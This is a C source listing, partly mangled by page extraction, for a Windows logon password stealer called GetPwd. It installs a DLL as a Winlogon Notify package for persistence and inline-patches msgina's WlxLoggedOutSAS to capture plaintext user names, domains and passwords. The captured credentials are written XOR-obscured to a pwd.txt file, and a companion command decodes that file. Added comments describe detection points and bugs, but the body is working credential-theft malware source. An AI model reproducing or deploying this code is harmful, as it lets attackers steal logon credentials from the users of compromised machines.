31.{
32.buffer[i]=buffer[i]^3;
33.}
34.printf("解密内容为:
/r/n%s",buffer);
35.return;
36.}
37.bool installed(); // Forward declaration (defined below): true when the Winlogon\Notify\GetPwd registry key already exists.
// Installer. Extracts the DLL embedded as resource IDR_DLL1 (type "dll"), writes it
// into the Windows directory as GetPwd.dll and registers it as a Winlogon
// notification package. Artifacts left behind (the things a defender would look for):
//   file:     <GetWindowsDirectory()> + "//GetPwd.dll" (separator as printed in this listing)
//   registry: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\GetPwd
//             with values "dllname" (= the DLL path) and "startup" (= "dog")
// Writing HKLM and the Windows directory requires administrative rights.
// No return value; outcome is only reported via printf.
// NOTE(review): FindResource/LoadResource/GlobalAlloc/CreateFile results are used
// without any NULL / INVALID_HANDLE_VALUE check, and hkey is never closed.
38.void installe() // installer
39.{
40.if(installed())
41.{
42.printf("已经安装过了!
");
43.return;
44.}
45.HRSRC hResInfo;
46.HGLOBAL hResData;
47.DWORD dwSize, dwWritten;
48.LPBYTE p;
49.HANDLE hFile;
50.hResInfo = FindResource(NULL, MAKEINTRESOURCE(IDR_DLL1), "dll");
51.dwSize = SizeofResource(NULL, hResInfo);
52.hResData = LoadResource(NULL, hResInfo);
53.p = (LPBYTE)GlobalAlloc(GPTR, dwSize);
54.CopyMemory((LPVOID)p, (LPCVOID)LockResource(hResData), dwSize);// copy the resource bytes into a private buffer
55.char pfile[200];
56.GetWindowsDirectory(pfile, 200);
// strcat is unbounded; pfile holds 200 bytes.
57.strcat(pfile,"//GetPwd.dll");//C:
/WINDOWS/
58.hFile = CreateFile(pfile, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL);
59.WriteFile(hFile, (LPCVOID)p,dwSize, &dwWritten, NULL);
60.CloseHandle(hFile);
61.GlobalFree((HGLOBAL)p);
62.HKEY hkey;
// Persistence: the Notify subkey. Separators are printed as "//" in this listing
// (presumably "\\" in the original source).
63.if(ERROR_SUCCESS==RegCreateKey(HKEY_LOCAL_MACHINE,
64."SOFTWARE//Microsoft//Windows NT//CurrentVersion//Winlogon//Notify//GetPwd//",
65.&hkey)
66.)
67.{
68.char * name3 ="dog"; // value of "startup"; presumably the name of an exported entry point (not shown in this listing)
69.RegSetValueEx(hkey,"dllname",0,REG_SZ,(const unsigned char *)pfile,strlen(pfile));
70.RegSetValueEx(hkey,"startup",0,REG_SZ,(const unsigned char *)name3,strlen("dog"));
71.printf("安装成功!
");
72.}
73.else
74.{
75.printf("安装失败!
");
76.return;
77.}
78.}
// Returns true when the registry key created by installe() can be opened, i.e. the
// package is already registered; false otherwise.
// Opens with KEY_ALL_ACCESS, so without administrative rights a permission failure
// is indistinguishable from "not installed".
// NOTE(review): on the failure path hkey was never assigned, yet RegCloseKey(hkey)
// is still called on it (line 89).
79.bool installed()
80.{
81.HKEY hkey;
82.char sz[256]; // unused
83.DWORD dwtype, sl = 256; // unused
84.if(ERROR_SUCCESS !
= RegOpenKeyEx(HKEY_LOCAL_MACHINE,
85."SOFTWARE//Microsoft//Windows NT//CurrentVersion//Winlogon//Notify//GetPwd",
86.NULL, KEY_ALL_ACCESS, &hkey) // open failed: treated as "not installed"
87.)
88.{
89.RegCloseKey(hkey);
90.return false;
91.}
92.RegCloseKey(hkey);
93.return true;
94.}
// Prints command-line usage to stdout. The "/r/n" sequences are emitted literally as
// written here; they look like "\r\n" escapes whose backslashes were lost when the
// page was extracted.
95.void usag()// usage hint
96.{
97.printf("example:
/r/n");
98.printf("/r/n Install:
getpwd.exe installe");
99.printf("/r/n Decryp :
getpwd.exe Decryp /r/n");
100.}
// Entry point. Dispatches on argv[1] (case-insensitive): "installe" runs the
// installer, "Decryp" runs dey() (defined above this excerpt), anything else prints
// usage. Always returns 0.
// NOTE(review): argc is never checked; with no arguments argv[1] is NULL and is
// passed straight to lstrcmpi.
101.int main(int argc, char* argv[])
102.{
103.if(!
lstrcmpi(argv[1],"installe"))// case-insensitive match
104.{
105.installe();
106.return 0;
107.}
108.else if(!
lstrcmpi(argv[1], "Decryp"))
109.{
110.dey();
111.return 0;
112.}
113.usag();
114.return 0;
115.}
密码截获
1.#define WLX_SAS_ACTION_LOGON
(1)
// (the macro's value "(1)" was wrapped onto its own line by the page extraction)
2.DWORD WINAPI StartHook(LPVOID lpParameter); // thread body that installs the hook (defined below)
// Credential block that Winlogon passes through WlxLoggedOutSAS. All four fields are
// plaintext wide strings; this is the data the hook reads and writes to disk.
3.typedef struct _WLX_MPR_NOTIFY_INFO {
4.PWSTR pszUserName;
5.PWSTR pszDomain;
6.PWSTR pszPassword;
7.PWSTR pszOldPassword;
8.} WLX_MPR_NOTIFY_INFO, * PWLX_MPR_NOTIFY_INFO;
9.typedef int (WINAPI* WlxLoggedOutSAS)(
10.// function-pointer type matching the original export, so the call can be forwarded to the system
11.PVOID pWlxContext,
12.DWORD dwSasType,
13.PLUID pAuthenticationId,
14.PSIDpLogonSid,
15.PDWORD pdwOptions,
16.PHANDLE phToken,
17.PWLX_MPR_NOTIFY_INFOpNprNotifyInfo,
18.PVOID * pProfile
19.);
// Replacement routine installed over msgina!WlxLoggedOutSAS; same parameter list.
// Its definition is not part of this excerpt.
20.int WINAPI FunNewADDR(
21.PVOID pWlxContext,
22.DWORD dwSasType,
23.PLUID pAuthenticationId,
24.PSID pLogonSid,
25.PDWORD pdwOptions,
26.PHANDLE phToken,
27.PWLX_MPR_NOTIFY_INFO prNotifyInfo,
28.PVOID * pProfile);
29.// custom routine that takes over WlxLoggedOutSAS; parameters kept identical
30.void WriteLog(
31.PWLX_MPR_NOTIFY_INFOpNprNotifyInfo
32.);// prototype of the routine that saves user name and password to the log file
33.int WideToByte( PCHAR sz_target, PWSTR sz_source , int size_ansi); // wide -> ANSI conversion (not shown here)
34.void WriteCurrentTime(); // not shown here
35.void HookWlxLoggedOutSAS();
36.// install the hook
37.void UnHookWlxLoggedOutSAS();
38.// remove the hook
// Returns true only on Windows 2000 (major version 5, minor 0); false for every
// other version. DllMain uses it to choose which original-prologue bytes are kept
// in hooktable.OldCode.
// NOTE(review): when GetVersion() reports a non-NT platform (high bit set) osvi is
// never assigned, yet free(osvi) on line 59 still runs on the indeterminate pointer.
39.bool isWin2K()// check the operating-system version
40.{
41.DWORD winVer;
42.OSVERSIONINFO *osvi;
43.winVer=GetVersion();
44.if(winVer<0x80000000) // high bit clear: NT-family platform, per GetVersion's documented layout
45.{
46.osvi= (OSVERSIONINFO *)malloc(sizeof(OSVERSIONINFO));
47.if (osvi!
=NULL)
48.{
49.memset(osvi,0,sizeof(OSVERSIONINFO));
50.osvi->dwOSVersionInfoSize=sizeof(OSVERSIONINFO);
51.GetVersionEx(osvi);
52.if(osvi->dwMajorVersion==5L&&osvi->dwMinorVersion==0L)
53.{
54.free(osvi);
55.return true;
56.}
57.}
58.}
59.free(osvi);
60.return false;
61.}
62.#pragma pack
(1)// byte alignment (the "(1)" argument was wrapped onto its own line by the page extraction)
// Shared state of the inline hook; filled in by DllMain and StartHook.
// Several member declarations below have lost the space between type and name
// in this listing (e.g. "HMODULEhMsgina").
63.struct HookTable{
64.HMODULEhMsgina; // handle of msgina.dll
65.WlxLoggedOutSAS OldDDR; // address of the original export; its first 5 bytes get patched
66.WlxLoggedOutSAS NewADDR; // replacement routine (FunNewADDR)
67.unsigned charOldCode[6]; // original first 5 bytes of the export, written back by UnHookWlxLoggedOutSAS
68.unsigned charJmpCode[6]; // 5-byte jump written over the export by HookWlxLoggedOutSAS
69.};// hook bookkeeping struct
70.HookTable hooktable = {
71.0 ,
72.0 ,
73.&FunNewADDR ,
74."/x8B/xFF/x55/x8B/xEC", // expected first 5 bytes (XP/2003 layout; DllMain overwrites these on Windows 2000)
75."/xE9/x00/x00/x00/x00" // E9 = jmp; the four displacement bytes are filled in by StartHook
76.};
77./*
78.#pragma pack()
// DLL entry point. Adjusts hooktable.OldCode for Windows 2000 (on every reason
// code, not only attach), then on DLL_PROCESS_ATTACH starts a thread running
// StartHook, which patches msgina!WlxLoggedOutSAS in this process. Always returns TRUE.
// Defender note: this DLL is registered under Winlogon\Notify by installe(), so it
// is presumably loaded into winlogon; a Notify package that patches msgina in
// memory is the classic pre-Vista credential-hook pattern — creation of that key
// and of unexpected DLLs in the Windows directory are the detection points.
// NOTE(review): creating a thread inside DllMain runs under the loader lock and is
// discouraged. The "/*" on the preceding listing line 77 has no visible closing
// "*/" in this excerpt; as printed, everything from there on sits inside a comment,
// which looks like an extraction artifact.
79.BOOL APIENTRY DllMain( HANDLE hModule,
80.DWORD ul_reason_for_call,
81.LPVOID lpReserved
82. )
83.{
84.if(isWin2K())
85.// Windows 2000's first five bytes differ from XP/2003's
86.{
87.hooktable.OldCode[0] ='/x55';
88.hooktable.OldCode[1] ='/x8B';
89.hooktable.OldCode[2] ='/xEC';
90.hooktable.OldCode[3] ='/x83';
91.hooktable.OldCode[4] ='/xEC';
92.}
93.switch (ul_reason_for_call)
94.{
95.case DLL_PROCESS_ATTACH:
96.HANDLE hthread = CreateThread( 0 ,
97.0 ,
98.LPTHREAD_START_ROUTINE(StartHook) ,
99.0 ,
100.0 ,
101.0);
102.CloseHandle( hthread ); // handle dropped immediately; the thread is never joined
103.break;
104.}
105.return TRUE;
106.}
// Thread body started from DllMain. Resolves msgina!WlxLoggedOutSAS, keeps its
// address in hooktable.OldDDR, fills in the displacement of the relative jump in
// hooktable.JmpCode so it lands on hooktable.NewADDR, then installs the patch.
// Returns 0 in every case, including when msgina.dll or the export is not found.
// NOTE(review): the displacement is computed from 32-bit int casts of pointers, so
// this only holds in a 32-bit process. The local p on line 120 is unused.
107.DWORD WINAPI StartHook(LPVOID lpParameter)
108.{
109.hooktable.hMsgina = GetModuleHandle( _T("msgina.dll"));
110.if ( hooktable.hMsgina == NULL)
111.{
112.return 0 ;
113.}
114.hooktable.OldDDR = (WlxLoggedOutSAS)GetProcAddress( hooktable.hMsgina , _T("WlxLoggedOutSAS") );
115.// original function address; needed later to remove the hook
116.if (hooktable.OldDDR == NULL)
117.{
118.return 0 ;
119.}
120.unsigned char *p = (unsigned char *)hooktable.OldDDR;
121.int *OpCode = (int *)&hooktable.JmpCode[1];// the 4 displacement bytes after the E9 opcode
122.int Code = (int)hooktable.NewADDR - (int)hooktable.OldDDR - 5; // relative to the end of the 5-byte jump
123.*OpCode = Code;
124.HookWlxLoggedOutSAS();
125.return 0;
126.}
// Installs the inline hook: makes the first 5 bytes at hooktable.OldDDR writable,
// overwrites them with hooktable.JmpCode and restores the previous page protection.
// Defender note: after this runs, the in-memory entry of msgina's WlxLoggedOutSAS
// no longer matches the module's on-disk image, which is what a code-integrity
// scan of the hosting process would flag.
// NOTE(review): both VirtualProtect results are ignored; if the first call fails
// the write below faults. OldProtect is a DWORD but is initialised with NULL.
127.void HookWlxLoggedOutSAS()
128.{
129.DWORD OldProtect = NULL;
130.VirtualProtect( hooktable.OldDDR ,
131.5 ,
132.PAGE_EXECUTE_READWRITE ,
133.&OldProtect
134.);// make the code page writable
135.unsigned char *p = (unsigned char *)hooktable.OldDDR;
136.for (int i=0 ; i < 5 ; i++ )
137.{
138.p[i] = hooktable.JmpCode[i];
139.}
140.VirtualProtect( hooktable.OldDDR ,
141.5 ,
142.OldProtect ,
143.&OldProtect
144.);
145.return;
146.}
// Removes the inline hook: writes hooktable.OldCode (the saved original bytes)
// back over the first 5 bytes at hooktable.OldDDR, using the same protect /
// write / restore sequence as HookWlxLoggedOutSAS.
// NOTE(review): no caller of this routine is visible in the excerpt, so the patch
// may stay in place for the lifetime of the hosting process. VirtualProtect
// results are again unchecked.
147.void UnHookWlxLoggedOutSAS()
148.{
149.DWORD OldProtect = NULL;
150.VirtualProtect( hooktable.OldDDR ,
151.5 ,
152.PAGE_EXECUTE_READWRITE ,
153.&OldProtect );
154.unsigned char *p = (unsigned char *)hooktable.OldDDR;
155.for (int i=0 ; i < 5 ; i++ )
156.{
157.p[i] = hooktable.OldCode[i];
158.}
159.VirtualProtect( hooktable.OldDDR ,
160.5 ,
161.OldProtect ,
162.&OldProtect );
163.return;
164.}
// Global scratch buffer holding the ANSI log line that WriteLog XORs and writes to
// disk. NOTE(review): WriteLog zeroes size_u + 1024 bytes into it (line 179), which
// exceeds these 1124 bytes as soon as the combined credential length passes 100.
165.char pBuffer[1124];
166.void WriteLog(PWLX_MPR_NOTIFY_INFOpNprNotifyInfo)
167.//主要是一些文件操作
168.{
169.int size_u = lstrlenW( pNprNotifyInfo->pszUserName );
170.size_u += lstrlenW( pNprNotifyInfo->pszDomain );
171.size_u += lstrlenW( pNprNotifyInfo->pszPassword );
172.size_u += lstrlenW( pNprNotifyInfo->pszOldPassword );
173.unsigned short *pWBuffer = (unsigned short *)GlobalAlloc( GMEM_FIXED , size_u + 1024 );
174.unsigned short *tWBuffer = (unsigned short *)GlobalAlloc( GMEM_FIXED , size_u + 1024 );
175.char pBuffer1[1124];
176.char *pwd =(char *)GlobalAlloc( GMEM_FIXED , size_u + 1024 );
177.char *pwd2 =(char *)GlobalAlloc( GMEM_FIXED , size_u + 1024*3 );
178.ZeroMemory( pWBuffer , size_u + 1024 );
179.ZeroMemory( pBuffer , size_u + 1024 );
180.ZeroMemory( pBuffer1 , size_u + 1024 );
181.if ( !
pBuffer )
182.{
183.return;
184.}else
185.{
186.WriteCurrentTime();
187.wsprintfW( pWBuffer ,
188.L"/r/nUser= %s /r/nDomain = %s/r/nPassWord = %s /r/nOldPass = %s/r/n" ,
189.pNprNotifyInfo->pszUserName ,
190.pNprNotifyInfo->pszDomain ,
191.pNprNotifyInfo->pszPassword,
192.pNprNotifyInfo->pszOldPassword
193.);
194.WideToByte( pBuffer ,
195.pWBuffer ,
196.lstrlenW( pWBuffer )
197.);
198.}
199.char LogPath[MAX_PATH] = {0};
200.GetSystemDirectory( LogPath , MAX_PATH);
201.lstrcat( LogPath , "//pwd.txt");
202.HANDLE hfile = CreateFile(
203.LogPath ,
204.GENERIC_WRITE ,
205.FILE_SHARE_WRITE ,
206.0 ,
207.OPEN_ALWAYS,
208.FILE_ATTRIBUTE_NORMAL ,
209.0 );
210.if (hfile !
= INVALID_HANDLE_VALUE)
211.{
212.unsigned long ret;
213.SetFilePointer( hfile , -1 , 0 , FILE_END);
214.int i=0;
215.SYSTEMTIME st;
216.int b;
217.for(;i218.{
219.pBuffer[i] = pBuffer[i] ^ 3;//加密采用异或方式
220.}
221.WriteFile( hfile , pBuffer , lstrlen( pBuffer ) , &ret , 0 );
222.CloseHandle( hfile );
223.}
2